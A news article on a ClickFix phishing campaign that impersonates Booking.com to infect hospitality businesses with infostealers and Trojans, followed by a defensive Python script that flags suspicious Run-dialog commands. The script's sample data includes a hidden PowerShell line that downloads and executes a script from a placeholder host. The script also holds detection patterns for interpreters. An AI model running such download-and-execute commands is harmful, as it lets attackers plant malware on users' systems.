- Microsoft warns of a new phishing campaign impersonating Booking.com
- It targets companies in the hospitality industry
- The objective is to deploy infostealers and Trojans
Hotels, seaside resorts and other hospitality businesses are being targeted with a sophisticated ClickFix phishing campaign that impersonates Booking.com.
A new report by Microsoft Threat Intelligence claims that the phishing campaign is “rapidly evolving” and targeting businesses around the world.
The objective of the campaign is to steal people's payment and personal data, which could lead to wire fraud and reputational damage for the victim organizations.
Storm-1865
First, the attackers craft a Booking.com-themed notification email, discussing things like guest reviews or account verification. Companies that do not spot the scam are then redirected to a fake CAPTCHA puzzle and, if they solve it, are shown an error message. This fake error message also comes with a "solution", which involves copying a command and pasting and executing it in the Run program.
Instead of solving the problem, running the command downloads one of the multiple strains of malware used in this campaign: XWorm, Lumma Stealer or VenomRAT. These are different types of malware with different features.
While VenomRAT, for example, is a remote access Trojan that gives attackers uninterrupted access to victim devices, Lumma is an infostealer that grabs login credentials and other secrets stored in the web browser and elsewhere on the device.
Microsoft attributed the campaign to a threat actor it tracks as Storm-1865, a group with no previous record. The campaign apparently started in December 2024, and there is no information on the number of companies, if any, that fell prey to it.
ClickFix fraud has become more popular lately, and TechRadar Pro has already reported on it several times this year. It is an evolution of the old "IT technician" scam, in which a victim is served a popup impersonating a reputable company and saying that their computer is broken or infected.
The popup shares a phone number that the victim can call to speak to a computer technician and solve the problem. The "technician" ends up installing malware.
Although phone scams are still very much alive, the ClickFix campaign relies mainly on the victim doing most of the work, installing malware through a less obvious process (pasting a command into Run).
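
For defenders, the Run-dialog step described above leaves a trace: Windows records commands entered in Run under the per-user registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, where each entry ends in `\1` and `MRUList` gives the order. The Python below is an added example, not taken from Microsoft's report or the original article, that triages exported RunMRU values for download-and-execute one-liners. The sample data is constructed, and the interpreter list and trait patterns are heuristics assumed for illustration.

```python
import re

# Assumed heuristic: programs a pasted Run command can hand a script or URL to.
INTERPRETERS = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|curl|certutil|bitsadmin)(\.exe)?\b",
    re.IGNORECASE,
)
# Assumed heuristic: traits of a pasted one-liner rather than a hand-typed command.
TRAITS = {
    "remote_url": re.compile(r"https?://", re.IGNORECASE),
    "encoded_arg": re.compile(
        r"\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.IGNORECASE),
}

def run_history(values):
    """Return Run-dialog commands, most recent first, from exported RunMRU values."""
    commands = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is not None:
            # Each stored command carries a trailing "\1" marker; strip it.
            commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands

def triage(values):
    """Return (command, traits) for entries that call an interpreter AND show a trait."""
    findings = []
    for cmd in run_history(values):
        if not INTERPRETERS.search(cmd):
            continue
        hits = sorted(t for t, rx in TRAITS.items() if rx.search(cmd))
        if hits:
            findings.append((cmd, hits))
    return findings

# Constructed sample export (not real telemetry); example.invalid is a placeholder.
SAMPLE = {
    "MRUList": "dcba",
    "a": "notepad\\1",
    "b": "cmd /c ipconfig\\1",
    "c": "\\\\fileserver\\share\\1",
    "d": "powershell -w hidden -c \"iwr https://example.invalid/fix.ps1 | iex\"\\1",
}

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE):
        print(f"SUSPICIOUS {hits}: {cmd}")
```

An entry such as `cmd /c ipconfig` is not flagged because it names an interpreter but shows none of the traits, which keeps routine administrator use of Run out of the results.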




